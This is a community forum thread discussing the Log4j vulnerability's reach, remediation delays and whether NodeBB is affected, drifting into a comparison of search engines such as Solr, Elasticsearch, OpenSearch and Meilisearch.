Log4j - What are people seeing - anythign to report?
-
Any happenings, insights etc. from the community of technical movers and shakers?
Log4j hole revives chatter on Big Biz funding open source
Would more money have prevented this security flaw? Would the cash be useful in other ways anyway?
(www.theregister.com)
-
@omega Interesting topic indeed. I'm a security expert and head of IT by trade (also Chief Information Security Officer), and Log4j is one of those vulnerabilities that is so encompassing and wide ranging, I'd frankly be shocked if there was even one single organisation on the planet that was not impacted by it.
The implications of this vulnerability are extensive - if you consider the "3 billion devices run Java" then that also equates to "3 billion devices vulnerable to Log4j". Even that equipment you didn't think uses Log4j probably does.
Whichever way you look at it, this is going to take organisations months to remediate because of the scale - and to make matters worse, some vendors will not release patches or fixes for their platforms until Q1 2022
If anyone is looking to get a list of known IP addresses to be leveraging this vulnerability, that can be found here
If anyone on here requires advice or support, I'm happy to provide that via https://sudonix.com (which of course is my NodeBB community :))
-
@phenomlab Apparently the fix is not adequate, and the vulnerability is open again!
We don't touch anything related to java here, although who knows what other software we depend on uses... at the very least, NodeBB instances shouldn't be affected, unless they use Solr as their search engine.
-
@julian said in Log4j - What are people seeing - anythign to report?:
unless they use Solr as their search engine
Ouch! Or maybe, Yikes!!
Heh, I have been meaning to experiment further w/Solr.
-
@julian there's also https://www.meilisearch.com/
-
I agree with @phenomlab above:
log4jis widely used and extremely popular. So it was only mattrer of time. This was fully .` to happen, thus not yet.All ( or almost all ) of the so-called
remediesout there is useless.There is absolutely no need to use
log4j; one can write own logger ( its not so hard ), or use built-in logging feature. Many frameworks (php,python..... ) has one.Here is what the simplest logger tads in
JS// Set log-text to, say, app name let xii = {namespace}.appName; // Log Console.log(xii);Above is 100% hack-proof
-
@macfan Agree with this, but the core issue here is software that comes prebundled with
log4j- not so much self-developed code. -
@julian said in Log4j - What are people seeing - anythign to report?:
@gotwf I think the new hotness is elasticsearch.
But you know what I want to play around with? https://typesense.org/
I think not. Substitute "new" for "was" then I concur. Modern times methinks Opensearch will put many nails in their coffin.
Seems many, many thousands of end lusers are less than fond of the SSPL.
Be all that as it may, horses for courses. Each optimizes for slightly different niches. Each do so very well. Indeed.
Rock on!
-
@pitaj said in Log4j - What are people seeing - anythign to report?:
@julian there's also https://www.meilisearch.com/
Looks interesting. Promising, even. Young, yet though, eh? Worth keeping a thumb on its pulse.
-
@gotwf said in Log4j - What are people seeing - anythign to report?:
Wikipedia Page
Really?
Wiki sucks terrible on so many surfaces.......... Its not definite source for sure.As of OpenSearch:: it seems that its near deprecation, so its no worthy mentioning.........although the code itself is of pretty good quality and can be reused in something bigger...........
Although I personally would use nothing that - in any point of time - has been touched by Mozilla ( former / current ) employee ( s )
-
@macfan said in Log4j - What are people seeing - anythign to report?:
@gotwf said in Log4j - What are people seeing - anythign to report?:
Wikipedia Page
Really?
Wiki sucks terrible on so many surfaces.......... Its not definite source for sure.Hence why it was only one of three cited links.
As of OpenSearch:: it seems that its near deprecation, so its no worthy mentioning.........although the code itself is of pretty good quality and can be reused in something bigger...........
Mayhaps I am confused but did not Amazon "donate" it to OpenSearch.Org?
Although I personally would use nothing that - in any point of time - has been touched by Mozilla ( former / current ) employee ( s )
I presume you are referencing millisearch here? I did not look at its origins.
